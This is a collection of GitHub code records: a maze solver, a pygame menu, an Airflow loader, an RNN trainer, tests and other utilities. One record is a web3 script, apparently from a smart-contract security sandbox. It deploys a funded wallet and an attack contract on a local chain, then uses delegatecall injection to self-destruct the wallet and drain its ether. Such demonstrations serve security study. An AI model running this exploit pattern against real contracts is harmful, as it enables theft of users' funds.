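corners = np.array([(40, 50), (160, 50), (160, 150), (40, 150)], dtype="float32")
warped = four_point_transform(img, corners)
print(warped.shape)  # (100, 120, 3): the cropped, axis-aligned patch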
+{"seq_id":"42814315262","text":"# -*- coding: utf-8 -*-\n\"\"\"미로 탐색\n\nN×M크기의 배열로 표현되는 미로가 있다.\n\n1\t0\t1\t1\t1\t1\n1\t0\t1\t0\t1\t0\n1\t0\t1\t0\t1\t1\n1\t1\t1\t0\t1\t1\n미로에서 1은 이동할 수 있는 칸을 나타내고, 0은 이동할 수 없는 칸을 나타낸다. 이러한 미로가 주어졌을 때,\n(1, 1)에서 출발하여 (N, M)의 위치로 이동할 때 지나야 하는 최소의 칸 수를 구하는 프로그램을 작성하시오.\n한 칸에서 다른 칸으로 이동할 때, 서로 인접한 칸으로만 이동할 수 있다.\n\n위의 예에서는 15칸을 지나야 (N, M)의 위치로 이동할 수 있다. 칸을 셀 때에는 시작 위치와 도착 위치도 포함한다.\n\n첫째 줄에 두 정수 N, M(2 ≤ N, M ≤ 100)이 주어진다.\n다음 N개의 줄에는 M개의 정수로 미로가 주어진다. 각각의 수들은 붙어서 입력으로 주어진다.\n\n첫째 줄에 지나야 하는 최소의 칸 수를 출력한다. 항상 도착위치로 이동할 수 있는 경우만 입력으로 주어진다.\n\"\"\"\nfrom collections import deque\n\ndx = (1, 0, -1, 0)\ndy = (0, -1, 0, 1)\n\nn, m = map(int, input().split())\n\nboard = [input() for _ in range(n)]\n\n\ndef is_valid_coord(y, x):\n return 0 <= y < n and 0 <= x < m\n\n\ndef bfs(sy, sx):\n check = [[0] * m for _ in range(n)]\n check[sy][sx] = 1\n q = deque()\n q.append((sy, sx))\n\n while q:\n y, x = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if is_valid_coord(ny, nx) and board[ny][nx] == '1' and check[ny][nx] == 0:\n check[ny][nx] = check[y][x] + 1\n q.append((ny, nx))\n return check\n\n\nprint(bfs(0, 0)[n - 1][m - 1])\n","repo_name":"hodoodang/legendary-guacamole","sub_path":"BOJ/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69832601709","text":"from game.scenes.scene import Scene\n\nfrom game.objects.enemys.koishi_komeiji import KoishiKomeiji\nfrom game.objects.enemys.yukari_yakumo import YukariYakumo\n\nimport pygame\nchapthers = [\n {\n \"name\" : \"The Lost sin in the dark wood\",\n \"enemys\": [KoishiKomeiji],\n \"background\": \"dark-wood\",\n \"music\": \"game-1\",\n \"hp\": 5,\n \"time\": 60,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple\",\n \"enemys\": [YukariYakumo],\n \"background\": \"temple\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 90,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple(Day)\",\n \"enemys\": [YukariYakumo,KoishiKomeiji],\n \"background\": \"temple_day\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n },{\n \"name\" : \"The Full Moon Night\",\n \"enemys\": [KoishiKomeiji,YukariYakumo],\n \"background\": \"red-moon\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n }\n]\n\nclass ChaptherSelectorScene(Scene):\n def __init__(self, engine):\n super().__init__(engine)\n self.tick = 0\n self.current_chapther = 0\n self.current_music = None\n def init(self):\n self.engine.music.play('intro')\n\n for i,chapther in enumerate(chapthers):\n scale_factor = 30\n sprite = self.engine.sprites[chapther[\"background\"]]\n small_image = pygame.transform.smoothscale(sprite[\"image\"], (sprite[\"rect\"].width // scale_factor, sprite[\"rect\"].height // scale_factor))\n chapther[\"background-blurred\"] = pygame.transform.smoothscale(small_image, (self.engine.WIDTH, self.engine.HEIGHT))\n chapther[\"background-resized\"] = pygame.transform.scale(sprite[\"image\"], (self.engine.WIDTH * 0.4, self.engine.HEIGHT * 0.6))\n \n chapther[\"offset_x_target\"] = 0\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n chapther[\"offset_x\"] = chapther[\"offset_x_target\"]\n \n return;\n def draw_chapther(self, screen, chapther):\n offset_x = chapther[\"offset_x\"]\n detail = f\"\"\"Level Detail\nenemys: {len(chapther[\"enemys\"])}\nhp: {chapther[\"hp\"]}\nmax_hp: {chapther[\"max_hp\"]}\n\"\"\"\n screen.blit(chapther[\"background-resized\"], ((self.engine.WIDTH*0.1)+ offset_x,self.engine.HEIGHT*0.2))\n screen.draw.text(chapther[\"name\"], topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.2), fontsize=48, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Max Time:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.56), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(str(chapther[\"time\"]) + \" Seconds\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.65), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Higest Score:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.73), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text((str(chapther[\"higest_score\"] if \"higest_score\" in chapther else 0)).zfill(12), bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.82), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(detail, topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.25), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n def draw(self, screen):\n screen.blit(chapthers[self.current_chapther][\"background-blurred\"], (0,0))\n 
self.draw_chapther(screen,chapthers[self.current_chapther])\n if self.current_chapther > 0: self.draw_chapther(screen,chapthers[self.current_chapther-1])\n if self.current_chapther < len(chapthers) - 1: self.draw_chapther(screen,chapthers[self.current_chapther+1])\n screen.draw.text(\"LEVEL SELECTOR\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT * 0.1), fontsize=62, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.blit('arrow_left', (0,self.engine.HALF_HEIGHT - 36))\n screen.blit('arrow_right', (self.engine.WIDTH * 0.95,self.engine.HALF_HEIGHT - 36))\n if self.tick // 24 % 2 == 0:\n screen.draw.text(\"Press Enter to start the game!\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT*0.9), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n return;\n def update(self,pygame):\n self.tick += 1\n if self.engine.controller.keyboard_pressed[pygame.K_RETURN]:\n self.engine.sounds.pause.play()\n # self.engine.change_scene(\"CHAPTHER_SELECTER\", background=\"dark-wood\", enemys=[])\n if not self.current_music == chapthers[self.current_chapther][\"music\"]:\n self.current_music = chapthers[self.current_chapther][\"music\"]\n self.engine.music.play(self.current_music)\n for chapther in chapthers:\n chapther[\"offset_x\"] += (chapther[\"offset_x_target\"] - chapther[\"offset_x\"]) / 16\n return;\n def on_key_down(self, key, mod, unicode, pygame):\n if key == pygame.K_a or key == pygame.K_LEFT:\n self.current_chapther -= 1\n if key == pygame.K_d or key == pygame.K_RIGHT:\n self.current_chapther += 1\n if key == pygame.K_RETURN or key == pygame.K_e:\n chapther = chapthers[self.current_chapther]\n self.engine.change_scene(\"GAME\", background=chapther[\"background\"], enemys=chapther[\"enemys\"], music=chapther[\"music\"])\n self.engine.sounds.pause.play()\n if key == pygame.K_ESCAPE:\n self.engine.change_scene(\"INTRO\")\n self.current_chapther = min(max(self.current_chapther,0),len(chapthers)-1)\n chapthers[self.current_chapther][\"offset_x_target\"] = 0\n for i,chapther in enumerate(chapthers):\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n","repo_name":"chanios/project-pygame","sub_path":"game/scenes/chapther_selecter.py","file_name":"chapther_selecter.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
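The chapter selector above blurs each background by smoothscaling it down by a factor of 30 and back up to full size; a minimal standalone sketch of that trick (the surface size and fill color here are arbitrary).

import pygame

surf = pygame.Surface((640, 360))
surf.fill((120, 40, 200))
small = pygame.transform.smoothscale(surf, (640 // 30, 360 // 30))
blurred = pygame.transform.smoothscale(small, (640, 360))  # cheap blur approximation
print(blurred.get_size())  # (640, 360)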
+{"seq_id":"33747995759","text":"'''\nTopic class to simulate course topic\nAuthor : Mayuri Wadkar\n'''\n\nfrom Utils import technologies_stopwords, fetch_description_techs\nfrom SummarizationModule import *\nfrom bs4 import BeautifulSoup as Soup\nimport urllib\n\nclass Topic:\n\n def __init__(self):\n self.cluster = None\n self.topic = None\n self.technologies = None\n self.listedTech = None\n self.actionList = None\n self.summary = None\n\n '''\n Function to initiate extraction of course topic, technologies, action lists and summary\n '''\n def set_syllabus_content(self):\n\n job_closest_to_centroid = self.cluster.closest_job_document\n description_of_job_closest_to_centroid, techSet_of_job_closest_to_centroid = fetch_description_techs(job_closest_to_centroid.jobLink)\n title_of_job_closest_to_centroid = job_closest_to_centroid.jobTitle\n\n #integration with NLP\n job_descriptions = \"\"\n # job_titles = \"\"\n technologies = set()\n\n for job in self.cluster.cluster:\n url = job.jobLink\n # print job.jobLink\n joblinkTarget = Soup(urllib.urlopen(url), \"html.parser\")\n techTags = joblinkTarget.findAll('a', attrs={'class': 'post-tag job-link no-tag-menu'})\n for tag in range(len(techTags)):\n tech = str(techTags[tag].get_text())\n if tech not in technologies_stopwords:\n technologies.add(tech)\n\n job_description = joblinkTarget.find('div', attrs={'class': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('span', attrs={'class': 'summary'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('div', attrs={'itemprop': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n if job_description != None:\n job_descriptions += job_description\n # job_titles += job.jobTitle\n\n summarizer = SummarizationModule()\n\n self.summary = summarizer.summarize_job_descriptions(job_descriptions)\n self.listedTech, self.actionList = summarizer.get_listed_tech_and_action_list(job_descriptions)\n self.technologies = technologies\n self.topic = summarizer.get_topic(title_of_job_closest_to_centroid)","repo_name":"Mayuri-Wad-012447851/Course-Recommendation-Project","sub_path":"Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33531897299","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom helpers import SqlQueries\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nclass PreProcessAndLoadOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n redshift_table_name,\n redshift_conn_id='redshift',\n month_name = 'October',\n truncate=True,\n *args, **kwargs):\n\n super(PreProcessAndLoadOperator, self).__init__(*args, **kwargs)\n self.table_name=redshift_table_name\n self.redshift_conn_id = redshift_conn_id\n self.truncate = truncate\n self.month_name = month_name\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n df = redshift.get_pandas_df(SqlQueries.select_from_table.format(table_name=self.table_name))\n\n df = df.sort_values(['country', 'date'])\n df['confirmed'] = df.groupby(['country'])['confirmed'].diff().fillna(0)\n df['recovered'] = df.groupby(['country'])['recovered'].diff().fillna(0)\n df['deaths'] = df.groupby(['country'])['deaths'].diff().fillna(0)\n df['date'] = pd.to_datetime(df['date'])\n df = df[df['date'].dt.month_name()== self.month_name]\n\n if self.truncate:\n redshift.run(SqlQueries.truncate_table.format(table_name=\"covid_cases\"))\n\n rows = list(df.itertuples(index=False, name=None))\n redshift.insert_rows(table=\"covid_cases\", rows=rows, commit_every=0)\n \n","repo_name":"MBtech/data-eng-capstone","sub_path":"airflow/plugins/operators/preprocess_and_load.py","file_name":"preprocess_and_load.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11271437231","text":"\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import to_categorical\r\n\r\nclass RNN_func:\r\n\t\r\n\tdef __init__(self, word_dim, hidden_dim=4, bptt_truncate=0):\r\n # Khởi tạo thông số cơ bản (vocabulary, lớp ẩn)\r\n\t\tself.word_dim = word_dim\r\n\t\tself.hidden_dim = hidden_dim\r\n\t\tself.bptt_truncate = bptt_truncate\r\n # Khởi tạo thông số mạng ngẫu nhiên\r\n\t\tself.U = np.random.uniform(-np.sqrt(1./word_dim), np.sqrt(1./word_dim), (hidden_dim, word_dim))\r\n\t\tself.V = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (word_dim, hidden_dim))\r\n\t\tself.W = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))\r\n\r\n\tdef forward_propagation(self, x):\r\n # Tông số time steps\r\n\t\tT = len(x)\t\t\r\n\t\t# Lưu lại các giá trị lớp ra o và lớp ẩn s để sử dụng sau này\r\n\t\ts = np.zeros((T, self.hidden_dim))\r\n\t\ts[-1] = np.zeros(self.hidden_dim)\r\n\t\t\r\n\t\to = np.zeros((T, self.word_dim))\r\n\t\t# Tính o và s theo công thức\r\n\t\t# s[t] = tanh(U.x[t] + W.s[t-1])\r\n\t\t# o[t] = softmax(V.s[t])\r\n\t\tfor t in np.arange(T):\r\n\t\t \r\n\t\t\ts[t] = np.tanh(self.U[:,x[t]] + self.W.dot(s[t-1]))\r\n\t\t\to[t] = softmax(self.V.dot(s[t]))\r\n\t\treturn [o, s]\r\n \r\n\t\r\n\tdef predict(self, x):\r\n\t\t# Tính lan truyền thuận và với giá trị U, V, W sau khi training để dự đoán kết quả \r\n\t\to, s = self.forward_propagation(x)\r\n\t\ty_pre = np.argmax(o, axis=1) + 1\t\t \r\n\t\treturn y_pre[len(y_pre)-1] \r\n\r\n\r\n\tdef calculate_total_loss(self, x, y):\r\n\t#Tính sai số theo cross-entropy\t\t\t\t\r\n\t\to, s = self.forward_propagation(x)\r\n\t\t#Tạo one-hot vector\r\n\t\ty_temp = to_categorical(y, num_classes=5)\r\n\t\ty_temp = np.delete(y_temp,0,1)\r\n\t\t\r\n\t\tE = (- np.mean(np.sum(y_temp * np.log(o), axis=1)))\r\n\t\t\r\n\t\treturn E \r\n\r\n\r\n\tdef bptt(self, x, y):\r\n\t#Tính backpropagation through time\r\n\t T = len(y)\r\n\t # Tính lan truyền thuận\r\n\t o, s = self.forward_propagation(x)\r\n\t # Đạo hàm sai số theo U, L, W\r\n\t dEdU = np.zeros(self.U.shape)\r\n\t dEdV = np.zeros(self.V.shape)\r\n\t dEdW = np.zeros(self.W.shape)\r\n\t delta_o = o\r\n\t \r\n\t delta_o[np.arange(len(y)), y-1] -= 1\t \r\n\t \r\n\t # Mỗi bước ngược\r\n\t for t in np.arange(T)[::-1]:\r\n\t dEdV += np.outer(delta_o[t], s[t].T)\r\n\t # Khởi tạo delta_t\r\n\t delta_t = self.V.T.dot(delta_o[t]) * (1 - (s[t] ** 2))\r\n\t # Backpropagation through time theo chuỗi ngược liên tiếp \r\n\t for bptt_step in np.arange(max(0, t-self.bptt_truncate), t+1)[::-1]:\t \r\n\t dEdW += np.outer(delta_t, s[bptt_step-1]) \r\n\t dEdU[:,x[bptt_step]] += delta_t\r\n\t # update cho bước kế tiếp\r\n\t delta_t = self.W.T.dot(delta_t) * (1 - s[bptt_step-1] ** 2)\r\n\t return [dEdU, dEdV, dEdW]\r\n \t \r\n\t\r\n\r\n\tdef numpy_sgd_step(self, x, y, learning_rate):\r\n\t\t# tính gradient của sai số\r\n\t\tdEdU, dEdV, dEdW = self.bptt(x, y)\r\n\t\t# Cập nhật trọng số theo gradient\r\n\t\tself.U -= learning_rate * dEdU\r\n\t\tself.V -= learning_rate * dEdV\r\n\t\tself.W -= learning_rate * dEdW\r\n\r\n\t\r\n# SGD Loop\r\n# - model: RNN model \r\n# - X_train: training data set\r\n# - y_train: training data labels\r\n# - learning_rate: Khởi tạo learning rate cho SGD\r\n# - nepoch: số lượng epoch\r\n# - evaluate_loss_after: Đánh giá sai số sau mỗi k epoch\r\ndef train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=100, evaluate_loss_after=1):\r\n # Theo dõi sai số\r\n losses = 
[]\r\n num_examples_seen = 0\r\n for epoch in range(nepoch):\r\n \r\n if (epoch % evaluate_loss_after == 0):\r\n loss = model.calculate_total_loss(X_train, y_train) \r\n losses.append(loss)\r\n \r\n #Chỉnh lại learning rate nếu sai số tăng lên\r\n if (len(losses) > 1 and losses[-1]> losses[-2]):\r\n learning_rate = learning_rate * 0.75 \r\n print (\"Setting learning rate to %f\" % learning_rate)\r\n sys.stdout.flush()\r\n \r\n # One SGD step\r\n model.numpy_sgd_step(X_train, y_train, learning_rate)\r\n num_examples_seen += 1 \r\n \r\n return losses\r\n\r\ndef softmax(x):\r\n#Hàm softmax\r\n xt = np.exp(x - np.max(x))\r\n return xt / np.sum(xt)","repo_name":"luonghuuphuloc/artificial-inteligence-in-control","sub_path":"Recurrent-neural-network/RNN_BPTT/RNN_backpropagation.py","file_name":"RNN_backpropagation.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
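A hedged sketch of a numerical gradient check against the bptt() method above (it assumes the record's module, including its keras import, has been run). V is the one parameter whose analytic gradient stays exact even with the default bptt_truncate=0, so it is the safe entry to check; note that calculate_total_loss() averages over time steps while bptt() accumulates a sum, hence the division by T.

import numpy as np

np.random.seed(42)
model = RNN_func(word_dim=4, hidden_dim=3)
x = [0, 1, 2, 3]               # token indices into the columns of U
y = np.array([2, 3, 4, 1])     # labels in 1..word_dim, as the loss expects
T = len(y)
dEdU, dEdV, dEdW = model.bptt(x, y)
eps = 1e-6
i, j = 0, 0
model.V[i, j] += eps
loss_plus = model.calculate_total_loss(x, y)
model.V[i, j] -= 2 * eps
loss_minus = model.calculate_total_loss(x, y)
model.V[i, j] += eps           # restore the original weight
numeric = (loss_plus - loss_minus) / (2 * eps)
print(abs(numeric - dEdV[i, j] / T))  # should be close to zero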
+{"seq_id":"30502467650","text":"from test.utils import describe, it\nfrom unittest import TestCase, mock\n\nfrom src.adapter.local_file import LocalFileAdapter\n\n\nclass LocalFileTestCase(TestCase):\n @mock.patch(\n \"src.adapter.local_file.open\",\n new=mock.mock_open(read_data=\"filecontent\"),\n )\n @mock.patch(\"src.adapter.local_file.BytesIO\")\n @mock.patch(\"src.adapter.local_file.os\")\n @describe\n def test_uri(self, mock_os, mock_bytesio):\n @it\n def raises_if_the_input_is_not_dir():\n mock_os.path.isfile.return_value = False\n self.assertRaises(\n ValueError, LocalFileAdapter.load, *[\"./an-image\"]\n )\n\n mock_os.path.isfile.return_value = True\n mock_bytesio.return_value = \"some bytes\"\n\n @it\n def loads_a_remote_image():\n result = LocalFileAdapter.load(\"file.jpg\")\n mock_bytesio.assert_called_with(\"filecontent\")\n self.assertEqual(\"some bytes\", result)\n\n @it\n def does_not_load_a_file_with_invalid_extension():\n result = LocalFileAdapter.load(\"file.txt\")\n self.assertEqual(None, result)\n","repo_name":"melnyczuk/supercollager","sub_path":"test/unit/adapter/local_file_test.py","file_name":"local_file_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"26710971899","text":"# the extension solver of the 4 = 10 problem\n\"\"\"three or more numbers and operators, goal are given,\n this solver finds the formula that results goal\"\"\"\n \n# MAINTENANCE IS CONSIDERED\n\nfrom operator import truediv\nfrom itertools import permutations, product \n\n############################################\n############# MODIFY HERE ##################\n############################################\n \nnumbers = [3, 4, 7, 8] \noperators = ['+', '-', '*', '/'] \ngoal = 10 \nbracket = False \n \n############################################\n############################################\n############################################\n\n\ndef FindBrackPos(n) :\n tmpPos = []\n for i in range(0, 2 * n - 3, 2) :\n for j in range(2, 2 * n + 1, 2) :\n if j - i > 2 and j - i != 2*n:\n tmpPos.append((i, j))\n return tmpPos\n\n\ndef Solver(nums, opers, goal, bracket=True) :\n n = len(nums)\n brackPos = FindBrackPos(n)\n numList = list(set(permutations(nums, n)))\n operitem = []\n for _ in range(n - 1) :\n operitem.append(opers)\n operitem.append([\"\"])\n operList = list(product(*operitem))\n \n for i in numList :\n for j in operList :\n form = \"\"\n for k in range(n) : form += str(i[k]) + j[k]\n \n try :\n if abs(eval(form) - goal) < 0.01 : print(form)\n except ZeroDivisionError : continue\n \n if bracket : \n for k in brackPos :\n tmpform = form[0:k[0]] + \"(\" + form[k[0]:k[1]-1] + \")\" + form[k[1]-1:2*n+1] \n try :\n if abs(eval(tmpform) - goal) < 0.01 : print(tmpform)\n except ZeroDivisionError : continue \n\nSolver(numbers, operators, goal, bracket)\n","repo_name":"Jenix8/4equal10-Solver","sub_path":"n=m.py","file_name":"n=m.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7965408400","text":"from web3 import Web3\nfrom web3 import contract as c\n\nfrom solcx import compile_files\n\n\ndef get_contract_abi_bin(contract_file):\n\n compiled_sol = compile_files( contract_file,\n output_values=['abi', 'bin']\n )\n return compiled_sol\n\ndef deploy_contract(abi, bin, target_address = None):\n\n Contract = w3.eth.contract(abi=abi, bytecode=bin)\n if(target_address == None):\n #DEPLOY WALLET WITH 50 Ether\n contract_type = \"WALLET\"\n tx_hash = Contract.constructor().transact({'gasPrice': w3.eth.gas_price,'value': 50000000000000000000})\n else:\n #ELSE DEPLOY ATTACK CONTRACT\n contract_type = \"ATTACKER\"\n tx_hash = Contract.constructor(target_address).transact()\n tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n contract = w3.eth.contract(\n address=tx_receipt.contractAddress,\n abi=abi\n )\n print(f\"{contract_type} CONTRACT DEPLOY WITH ADDRESS: {contract.address}\")\n return contract\n\n#### CONNECT WEB3PY TO GANACHE\nw3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))\naccounts = w3.eth.accounts\n\nw3.eth.default_account = accounts[0]\n\ncompiled_contracts = get_contract_abi_bin(\"./WalletSelfDestructableByAnyone.sol\")\n\nfor ctr in compiled_contracts:\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Attack'):\n attack_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Wallet'):\n wallet_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n\n##### DEPLOY WALLET WITH ACCOUNT 0\nwallet = deploy_contract(wallet_abi_bin[0], wallet_abi_bin[1])\nwallet = c.ImplicitContract(wallet)\n\n##### DEPLOY ATTACK WITH ACCOUNT 1\nw3.eth.default_account = accounts[1]\nattack_init_balance = w3.eth.get_balance(accounts[1])\nattack = deploy_contract(attack_abi_bin[0], attack_abi_bin[1], wallet.address)\n\nattack_address = attack.address\n\ntry:\n wallet.delegateCallToAnotherContract(attack_address)\nexcept Exception as e:\n print(e)\n print(\"Not owner.\")\n exit(0)\n\nstolen_ether = w3.eth.get_balance(accounts[1])-attack_init_balance\nstolen_ether = w3.fromWei(stolen_ether, 'ether')\nprint(f\"\\nAttacker was able to self destruct and steal {stolen_ether} from Wallet: {wallet.address}\")\n \n\n","repo_name":"jcrreis/solidity-tools-sandbox","sub_path":"Examples/DelegateCallInjection/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10839466183","text":"\"\"\"\nNBScratch: Jupyter Notebook Extension placing a computational scratchpad in the\nnotebook\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nfrom notebook.utils import url_path_join\nfrom notebook.base.handlers import IPythonHandler, path_regex\n\nclass NBScratchHandler(IPythonHandler):\n\n # manage connections to various sqlite databases\n db_manager_directory = {}\n\n # check if extension loaded by visiting http://localhost:8888/api/nbscratch\n def get(self, path=''):\n \"\"\"\n Handle GET request\n \"\"\"\n\n html = \"NBScratch is working \"\n self.write(html)\n\n def post(self, path=''):\n \"\"\"\n Handle POST request\n \"\"\"\n\n print(\"Just got the NBScratch POST requst\")\n self.finish(json.dumps({'time': datetime.now()}))\n\ndef _jupyter_server_extension_paths():\n \"\"\"\n Jupyter server configuration\n returns dictionary with where to find server extension files\n \"\"\"\n return [{\n \"module\": \"nbscratch\"\n }]\n\ndef _jupyter_nbextension_paths():\n \"\"\"\n Jupyter nbextension configuration\n returns dictionary with where to find nbextension files\n \"\"\"\n return [dict(\n section=\"notebook\",\n # the path is relative to the `nbscratch` directory\n src=\"static\",\n # directory in the `nbscratch/` namespace\n dest=\"nbscratch\",\n # _also_ in the `nbscratch/` namespace\n require=\"nbscratch/main\")]\n\ndef load_jupyter_server_extension(nb_app):\n \"\"\"\n Load the server extension and set up routing to proper handler\n nb_app: (obj) Jupyter Notebook Application\n \"\"\"\n\n nb_app.log.info('NBScratch Server extension loaded')\n web_app = nb_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'],\n r\"/api/nbscratch%s\" % path_regex)\n web_app.add_handlers(host_pattern, [(route_pattern, NBScratchHandler)])\n","repo_name":"acrule/nbscratch","sub_path":"nbscratch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70027269552","text":"Boss = False\nYou = 5\nEnemy = 5\nBoss_hp = 10\n\nwhile Enemy == 5:\n print(\"Enemy still stands\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 5:\n print(\"You defeated it!\")\n Enemy = 0\n break\n\n elif Attack <= 5:\n print(\"You did not do enough damage.\")\n\nif Enemy == 0:\n Boss = True\n\nwhile Boss == True:\n print(\"The boss stands before you\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 10:\n print(\"The boss falls\")\n print(\"Congratulations!\")\n break\n\n elif Attack <= 10:\n print(\"the boss survives and counters! Deals 3 damage!\")\n You = You - 3\n\n if You <= 0:\n print(\"YOU DIED\")\n exit()\n\n\n\n\n","repo_name":"Blackisrafil/testproject","sub_path":"practice projects/Def practice.py","file_name":"Def practice.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"35407448783","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import Grouper\r\nfrom data.nn_data.datasets.truck_dataset import TruckDataSet\r\nfrom data.nn_data.instance_segmentation_data import InstanceSegmentationData\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom pathlib import Path\r\n\r\nfrom data.user_data.eye_data import EyeData\r\nfrom data.user_data.hand_data import HandData\r\nfrom data.user_data.head_data import HeadData\r\nfrom math_helper.math_helper import MathHelper\r\nimport constants\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nfrom sklearn.metrics import roc_curve, auc, RocCurveDisplay, roc_auc_score, confusion_matrix, ConfusionMatrixDisplay\r\n\r\nfrom itertools import cycle\r\n\r\n\r\nclass Visualizer():\r\n\r\n def __init__(self) -> None:\r\n pass\r\n\r\n def visualize_head_data(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n head_labels: list[list[str]]) -> None:\r\n\r\n first_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 1]\r\n second_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 2]\r\n third_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 3]\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n index = 0\r\n image_index = 0\r\n\r\n x_label = \"x - coord\"\r\n x_range = [-1, 1]\r\n y_label = \"y - coord\"\r\n y_range = [-1, 1]\r\n z_label = \"z - coord\"\r\n z_range = [-1, 1]\r\n\r\n labels = [\"FirstIntention\", \"SecondIntention\", \"ThirdIntention\"]\r\n marker = ['o', 'o', 'o']\r\n colors = [\"aqua\", \"fuchsia\", \"lawngreen\"]\r\n marker_size = 1\r\n\r\n ax.scatter(first_intention[head_labels[0][0]], first_intention[head_labels[0][2]], first_intention[head_labels[0][1]],\r\n marker=marker[0],\r\n s=marker_size,\r\n color=colors[0],\r\n label=labels[0])\r\n \r\n ax.scatter(second_intention[head_labels[0][0]], second_intention[head_labels[0][2]], second_intention[head_labels[0][1]],\r\n marker=marker[1],\r\n s=marker_size,\r\n color=colors[1],\r\n label=labels[1])\r\n \r\n ax.scatter(third_intention[head_labels[0][0]], third_intention[head_labels[0][2]], third_intention[head_labels[0][1]],\r\n marker=marker[2],\r\n s=marker_size,\r\n 